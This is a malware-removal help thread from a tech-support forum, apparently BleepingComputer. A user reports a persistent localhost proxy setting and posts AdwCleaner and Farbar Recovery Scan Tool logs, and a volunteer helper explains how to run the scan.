
Proxy server



#1 Mohasaiyan


Posted 06 June 2015 - 03:07 AM

I had this proxy server virus deal get on my cpu somehow and I cannot manage to get rid of it. I have gotten rid of most of the malware on my cpu, I think, with HitmanPro, Malwarebytes and AdwCleaner, but no matter what I remove, the proxy server still resurfaces on my registry. I have also deleted and reinstalled Chrome to no avail. I am completely at a loss as to where to go next and any help would be much appreciated. Here is my most recent AdwCleaner log; if you need any more logs please let me know.

 

***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Data Found : HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings [ProxyOverride] - <-loopback>
Data Found : HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings [ProxyServer] - hxxp=127.0.0.1:55783;hxxps=127.0.0.1:55783
Value Found : HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings [DefaultConnectionSettings]
Value Found : HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings [SavedLegacySettings]
 
***** [ Web browsers ] *****
 
-\\ Internet Explorer v11.0.9600.17801
 
 
-\\ Mozilla Firefox v29.0.1 (en-US)
 
 
-\\ Google Chrome v43.0.2357.81
 
 
-\\ Chromium v
 
 
*************************




#2 B-boy/StyLe/

  • Malware Response Team

Posted 08 June 2015 - 05:51 AM

Hello! Welcome to BleepingComputer Forums!
My name is Georgi and I will be helping you with your computer problems.

Before we begin, please note the following:

  • I will be working on your malware issues; this may or may not solve other issues you have with your machine.
  • The logs can take some time to research, so please be patient with me.
  • Stay with the topic until I tell you that your system is clean. Missing symptoms does not mean that everything is okay.
  • Instructions that I give are for your system only!
  • Please do not run any tools until requested! The reason for this is so I know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.
  • Please perform all steps in the order received. If you can't understand something don't hesitate to ask.
  • Again I would like to remind you to make no further changes to your computer unless I direct you to do so. I will not help you if you do not follow my instructions.

 

Please download the latest version of Farbar Recovery Scan Tool and save it to your desktop. Don't kill any malicious processes on your own.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system; that will be the right version.

  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Make sure that Addition.txt is checked before you press the Scan button.
  • Press Scan button.
  • It will make 2 logs (FRST.txt and Addition.txt) in the same directory the tool is run. Please copy and paste them to your reply.

 

 

Regards,

Georgi




#3 Mohasaiyan


Posted 08 June 2015 - 12:02 PM

Okay, here are the scan results.

 

First

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:07-06-2015
Ran by dell 2 (administrator) on SEVILLE on 08-06-2015 12:56:54
Running from C:\Users\dell 2\Downloads
Loaded Profiles: dell 2 & MSSQL$SQLEXPRESS (Available Profiles: dell 2 & MSSQL$SQLEXPRESS & Classic .NET AppPool & localhost & DefaultAppPool)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AuthenTec, Inc.) C:\Program Files\Fingerprint Sensor\ATService.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(SurfRight B.V.) C:\Program Files\HitmanPro\hmpsched.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(UPEK Inc.) C:\Program Files\Common Files\SPBA\upeksvr.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZCfgSvc7.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Wave Systems Corp.) C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmService.exe
(Andrea Electronics Corporation) C:\Program Files\IDT\WDM\AESTSr64.exe
(Broadcom Corporation) C:\Program Files\Broadcom\MgmtAgent\BrcmMgmtAgent.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Dell Inc.) C:\Program Files\Dell\Dell System Manager\DCPSysMgrSvc.exe
(Juniper Networks) C:\Program Files (x86)\Juniper Networks\Common Files\dsNcService.exe
(FileZilla Project) C:\Program Files (x86)\FileZilla Server\FileZilla server.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae-svc.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae64.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL11.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
(O2Micro International) C:\Windows\System32\o2flash.exe
() C:\Windows\SysWOW64\srvany.exe
(O2Micro.) C:\Windows\SysWOW64\SDIOAssist.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version8\TeamViewer_Service.exe
(VMware, Inc.) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE
(Symantec Corporation) C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\n360.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\n360.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version8\TeamViewer.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version8\tv_w32.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version8\tv_x64.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Integrated Clock Controller Service\ICCProxy.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Power Software Ltd) C:\Program Files\PowerISO\PWRISOVM.EXE
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae.exe
(Blizzard Entertainment) C:\Program Files (x86)\Battle.net\Battle.net.5833\Battle.net.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Blizzard Entertainment) C:\ProgramData\Battle.net\Agent\Agent.4056\Agent.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\43.0.2357.81\nacl64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\43.0.2357.81\nacl64.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\conathst.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM-x32\...\Run: [PWRISOVM.EXE] => C:\Program Files\PowerISO\PWRISOVM.EXE [408888 2015-04-07] (Power Software Ltd)
HKLM-x32\...\Run: [Malwarebytes Anti-Exploit] => C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae.exe [2618680 2015-04-08] (Malwarebytes Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
Winlogon\Notify\spba: C:\Program Files\Common Files\SPBA\homefus2.dll (UPEK Inc.)
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\Run: [Steam] => C:\Program Files (x86)\Steam\Steam.exe [2892992 2015-06-04] (Valve Corporation)
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\Run: [Battle.net] => C:\Program Files (x86)\Battle.net\Battle.net Launcher.exe [2860080 2015-06-05] (Blizzard Entertainment)
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [31280256 2015-04-17] (Skype Technologies S.A.)
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\MountPoints2: E - E:\Startup.exe
Lsa: [Authentication Packages] msv1_0 wvauth
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [EnabledUnlockedFDEIconOverlay] -> {30D3C2AF-9709-4D05-9CF4-13335F3C1E4A} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll [2011-03-04] (Wave Systems Corp.)
ShellIconOverlayIdentifiers: [OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Security Suite\Engine64\21.7.0.11\buShell.dll [2015-03-06] (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Security Suite\Engine64\21.7.0.11\buShell.dll [2015-03-06] (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Security Suite\Engine64\21.7.0.11\buShell.dll [2015-03-06] (Symantec Corporation)
ShellIconOverlayIdentifiers: [UninitializedFdeIconOverlay] -> {CF08DA3E-C97D-4891-A66B-E39B28DD270F} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll [2011-03-04] (Wave Systems Corp.)
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
ProxyServer: [.DEFAULT] => http=127.0.0.1:55783;https=127.0.0.1:55783
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://www.scientificamerican.com/
SearchScopes: HKLM-x32 -> {49606DC7-976D-4030-A74E-9FB5C842FA68} URL = http://www.bing.com/search?q={searchTerms}&form=DLRDF8&pc=MDDR&src=IE-SearchBox
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: TmIEPlugInBHO Class -> {1CA1377B-DC1D-4A52-9585-6E06050FAC53} -> c:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\TmIEPlg.dll [2010-03-09] (Trend Micro Inc.)
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2015-03-10] (Microsoft Corporation)
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security Suite\Engine64\21.7.0.11\coIEPlg.dll [2015-03-05] (Symantec Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-21] (Microsoft Corp.)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-05-01] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL [2015-04-14] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2015-04-14] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll No File
BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.130\McAfeeMSS_IE.dll [2013-09-06] (McAfee, Inc.)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-12-18] (Adobe Systems Incorporated)
BHO-x32: TmIEPlugInBHO Class -> {1CA1377B-DC1D-4A52-9585-6E06050FAC53} -> c:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\TmIEPlg32.dll [2010-03-09] (Trend Micro Inc.)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\coIEPlg.dll [2015-03-05] (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\IPS\IPSBHO.DLL [2015-03-04] (Symantec Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\ssv.dll [2015-04-18] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-21] (Microsoft Corp.)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-05-01] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL [2015-04-14] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\jp2ssv.dll [2015-04-18] (Oracle Corporation)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security Suite\Engine64\21.7.0.11\coIEPlg.dll [2015-03-05] (Symantec Corporation)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\coIEPlg.dll [2015-03-05] (Symantec Corporation)
DPF: HKLM {AA570693-00E2-4907-B6F1-60A1199B030C} https://juniper.net/dana-cached/sc/JuniperSetupClient64.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://sslvpn.uc.edu/dana-cached/sc/JuniperSetupClient.cab
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2015-02-03] (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-05-01] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-05-01] (Microsoft Corporation)
Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - c:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\TmIEPlg.dll [2010-03-09] (Trend Micro Inc.)
Handler-x32: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - c:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\TmIEPlg32.dll [2010-03-09] (Trend Micro Inc.)
Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62
Tcpip\..\Interfaces\{AE56321B-729F-4880-8BE3-0A8F58FDFAF3}: [NameServer] 8.8.8.8,8.8.4.4
 
FireFox:
========
FF ProfilePath: C:\Users\dell 2\AppData\Roaming\Mozilla\Firefox\Profiles\rwt78m02.default-1433511130034
FF Homepage: www.google.com
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_17_0_0_169.dll [2015-06-06] ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-16] ( Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2013-01-25] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_169.dll [2015-06-06] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1168638.dll [2012-10-04] (Adobe Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.45.2 -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\dtplugin\npDeployJava1.dll [2015-04-18] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.45.2 -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\plugin2\npjp2.dll [2015-04-18] (Oracle Corporation)
FF Plugin-x32: @mcafee.com/McAfeeMssPlugin -> C:\Program Files\McAfee Security Scan\3.8.130\npMcAfeeMss.dll [2013-09-06] (McAfee, Inc.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2013-09-22] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin-x32: @raidcall.en/RCplugin -> C:\Users\dell 2\AppData\Roaming\raidcall\plugins\nprcplugin.dll [2014-05-27] (Raidcall)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-27] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-27] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2013-02-15] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2013-01-25] (Adobe Systems)
FF Plugin HKU\S-1-5-21-1038277221-3604561771-2240411101-1006: @citrixonline.com/appdetectorplugin -> C:\Users\dell 2\AppData\Local\Citrix\Plugins\94\npappdetector.dll [2013-03-11] (Citrix Online)
FF Plugin HKU\S-1-5-21-1038277221-3604561771-2240411101-1006: @talk.google.com/GoogleTalkPlugin -> C:\Users\dell 2\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll [2015-04-17] (Google)
FF Plugin HKU\S-1-5-21-1038277221-3604561771-2240411101-1006: @talk.google.com/O1DPlugin -> C:\Users\dell 2\AppData\Roaming\Mozilla\plugins\npo1d.dll [2015-04-17] (Google)
FF Plugin HKU\S-1-5-21-1038277221-3604561771-2240411101-1006: @tools.google.com/Google Update;version=3 -> C:\Users\dell 2\AppData\Local\Google\Update\1.3.27.5\npGoogleUpdate3.dll No File
FF Plugin HKU\S-1-5-21-1038277221-3604561771-2240411101-1006: @tools.google.com/Google Update;version=9 -> C:\Users\dell 2\AppData\Local\Google\Update\1.3.27.5\npGoogleUpdate3.dll No File
FF Plugin HKU\S-1-5-21-1038277221-3604561771-2240411101-1006: google.com/WidevineMediaOptimizer -> C:\Users\dell 2\AppData\Roaming\IDM\bin\npwidevinemediaoptimizer.dll [2014-06-09] (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\dell 2\AppData\Roaming\mozilla\plugins\npgoogletalk.dll [2015-04-17] (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\dell 2\AppData\Roaming\mozilla\plugins\npo1d.dll [2015-04-17] (Google)
FF Extension: Adblock Plus - C:\Users\dell 2\AppData\Roaming\Mozilla\Firefox\Profiles\rwt78m02.default-1433511130034\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2015-06-08]
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2015-05-01]
FF HKLM-x32\...\Firefox\Extensions: [{22C7F6C6-8D67-4534-92B5-529A0EC09405}] - c:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\FirefoxExtension
FF Extension: Trend Micro NSC Firefox Extension - c:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\FirefoxExtension [2011-06-15]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\coFFPlgn [2015-06-08]
 
Chrome: 
=======
CHR Profile: C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-06-07]
CHR Extension: (Google Docs) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-06-07]
CHR Extension: (Google Drive) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-06-07]
CHR Extension: (YouTube) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-06-07]
CHR Extension: (Adblock Plus) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2015-06-08]
CHR Extension: (Google Search) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-06-07]
CHR Extension: (Google Sheets) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-06-07]
CHR Extension: (Bookmark Manager) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\gmlllbghnfkpflemihljekbapjopfjik [2015-06-07]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-06-07]
CHR Extension: (Norton Security Toolbar) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk [2015-06-08]
CHR Extension: (Google Wallet) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-06-07]
CHR Extension: (Gmail) - C:\Users\dell 2\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-07]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - https://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\Exts\Chrome.crx [2015-06-08]
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [akhdblbjebmbllhinponghfmaekhlhob] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\DELL2~1\AppData\Local\Google\Drive\apdfllckaahabafndbhieahigkjlhalf_live.crx [Not Found]
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bghejdcdajlenjngcknlkkoakmmjfanb] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [cckdoammdligdedbakcgnmegjljgipjb] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [clmghkfhfkcfhpccgbafbailibgogkbi] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [eajjckckolcbgmmenaiiigegbadpeghb] - https://clients2.google.com/service/update2/crx
